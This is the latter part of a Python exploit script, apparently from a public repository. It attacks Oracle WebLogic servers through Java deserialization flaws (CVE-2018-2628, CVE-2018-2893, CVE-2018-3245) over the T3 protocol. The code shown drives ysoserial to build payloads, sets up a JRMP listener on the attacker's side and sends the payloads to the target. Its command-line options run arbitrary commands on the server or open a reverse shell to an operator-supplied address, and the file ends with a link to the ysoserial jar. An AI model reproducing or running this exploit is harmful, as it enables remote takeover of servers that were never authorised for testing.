        print 'Trying to run the command '+sys.argv[4]
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_1 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        # Server response is captured but never used or printed.
        evil_return_data = send_payload_objdata(sock,PAYLOAD)
        print 'Exploit completed Successfully'
    if jpayload == '2':
        print "Exploiting CVE-2018-2893"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-2893'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd))
        time.sleep(3)
        print 'Trying to run the command '+sys.argv[4]
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_3 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        evil_return_data = send_payload_objdata(sock,PAYLOAD)
        print 'Exploit completed Successfully'
    # As in rs(): independent `if`s, so the `else` only pairs with the '3' test and
    # options '1'/'2' also print the "Select the correct option" text afterwards.
    if jpayload == '3':
        print "Exploiting CVE-2018-3245"
        t3_handshake(sock,server_addr)
        build_t3_request_object(sock,dport)
        print 'Generating ysoserial payload for CVE-2018-3245'
        os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd))
        time.sleep(3)
        print 'Trying to run the command '+sys.argv[4]
        PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 {}:1099 | xxd -p -c 1000000").format(sip)).read()
        PAYLOAD=PAYLOAD.strip()
        print 'Sending final payload'
        send_payload_objdata(sock,PAYLOAD)
        print 'Exploit completed Successfully'
    else:
        print "Select the correct option\n1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245"
168 |
169 |
if __name__=="__main__":
    # CLI entry point: argv[1] = target host, argv[2] = target port (int),
    # argv[3] = '-rs' or '-c'. `dport` is assigned at module scope here and is the
    # name build_t3_request_object() reads.
    try:
        dip = sys.argv[1]
        dport = int(sys.argv[2])
        switch = sys.argv[3]
        if switch == '-rs':
            try:
                # argv[4]: operator-side address for the reverse shell.
                sip = sys.argv[4]
                rs(dip,dport,switch,sip)
            except IndexError:
                print 'Usage: python weblogic_dser.py -rs '
        elif switch == '-c':
            try:

                # argv[4]: command to run, argv[5]: operator-side address.
                cmd = sys.argv[4]
                sip = sys.argv[5]

                run(dip,dport,switch,cmd,sip)
            except IndexError:
                print "Usage: python weblogic_dser.py -c '' "
        else:
            print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python weblogic_dser.py -c ''"
            print "Use the -rs switch to get a reverse shell, for e.g.: python weblogic_dser.py -rs "
    # Reached only when argv[1..3] are missing; a non-numeric argv[2] raises
    # ValueError, which is not caught here.
    except IndexError:
        print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python weblogic_dser.py -c ''"
        print "Use the -rs switch to get a reverse shell, for e.g.: python weblogic_dser.py -rs "
196 |
197 |
198 |
199 |
--------------------------------------------------------------------------------
/weblogic_dser/ysoserial-cve-2018-3245.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/weblogic_dser/ysoserial-cve-2018-3245.jar
--------------------------------------------------------------------------------